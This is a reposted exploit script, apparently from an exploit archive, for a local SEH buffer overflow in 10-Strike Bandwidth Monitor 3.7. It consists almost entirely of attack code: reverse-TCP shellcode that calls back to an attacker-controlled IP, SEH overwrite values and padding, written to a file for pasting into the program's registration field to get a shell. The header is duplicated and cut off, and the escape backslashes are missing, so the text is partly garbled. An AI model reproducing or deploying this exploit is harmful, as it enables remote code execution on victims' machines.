10-Strike Bandwidth Monitor 3.7 Local Buffer Overflow

Details
Category: Vulnerabilities
Hits: 253
# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Sof # Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml
# Run script, open up generated txt file and copy to clipboard
# Open Bandwith Monitor, Enter my key, Paste code from clipboard, hit OK, boom shell.
# Or from inside the app you can go to the Help tab, click Registration and Paste code from clipboard, hit OK, boom shell.

#!/usr/bin/python

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -b 'x00x0ax0d' -f python -v shellcode
shellcode = ""
shellcode += "xbbx03xe2x9bxb7xdaxc3xd9x74x24xf4x5e"
shellcode += "x29xc9xb1x52x31x5ex12x83xc6x04x03x5d"
shellcode += "xecx79x42x9dx18xffxadx5dxd9x60x27xb8"
shellcode += "xe8xa0x53xc9x5bx11x17x9fx57xdax75x0b"
shellcode += "xe3xaex51x3cx44x04x84x73x55x35xf4x12"
shellcode += "xd5x44x29xf4xe4x86x3cxf5x21xfaxcdxa7"
shellcode += "xfax70x63x57x8excdxb8xdcxdcxc0xb8x01"
shellcode += "x94xe3xe9x94xaexbdx29x17x62xb6x63x0f"
shellcode += "x67xf3x3axa4x53x8fxbcx6cxaax70x12x51"
shellcode += "x02x83x6ax96xa5x7cx19xeexd5x01x1ax35"
shellcode += "xa7xddxafxadx0fx95x08x09xb1x7axcexda"
shellcode += "xbdx37x84x84xa1xc6x49xbfxdex43x6cx6f"
shellcode += "x57x17x4bxabx33xc3xf2xeax99xa2x0bxec"
shellcode += "x41x1axaex67x6fx4fxc3x2axf8xbcxeexd4"
shellcode += "xf8xaax79xa7xcax75xd2x2fx67xfdxfcxa8"
shellcode += "x88xd4xb9x26x77xd7xb9x6fxbcx83xe9x07"
shellcode += "x15xacx61xd7x9ax79x25x87x34xd2x86x77"
shellcode += "xf5x82x6ex9dxfaxfdx8fx9exd0x95x3ax65"
shellcode += "xb3x59x12x4axc3x32x61x94xc2x79xecx72"
shellcode += "xaex6dxb9x2dx47x17xe0xa5xf6xd8x3exc0"
shellcode += "x39x52xcdx35xf7x93xb8x25x60x54xf7x17"
shellcode += "x27x6bx2dx3fxabxfexaaxbfxa2xe2x64xe8"
shellcode += "xe3xd5x7cx7cx1ex4fxd7x62xe3x09x10x26"
shellcode += "x38xeax9fxa7xcdx56x84xb7x0bx56x80xe3"
shellcode += "xc3x01x5ex5dxa2xfbx10x37x7cx57xfbxdf"
shellcode += "xf9x9bx3cx99x05xf6xcax45xb7xafx8ax7a"
shellcode += "x78x38x1bx03x64xd8xe4xdex2cxe8xaex42"
shellcode += "x04x61x77x17x14xecx88xc2x5bx09x0bxe6"
shellcode += "x23xeex13x83x26xaax93x78x5bxa3x71x7e"
shellcode += "xc8xc4x53"

# JMP always true
nseh = 'x71x06x70x04'

# 0x01174647 POP POP RET BandMonitor.exe
seh = 'x47x46x17x01'

payload = 'x41' * 4188
payload += nseh
payload += seh
payload += shellcode
payload += 'x41' * (1804 - len(shellcode))

file = open('sploit.txt','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(payload)
file.close()
print "TXT file created!"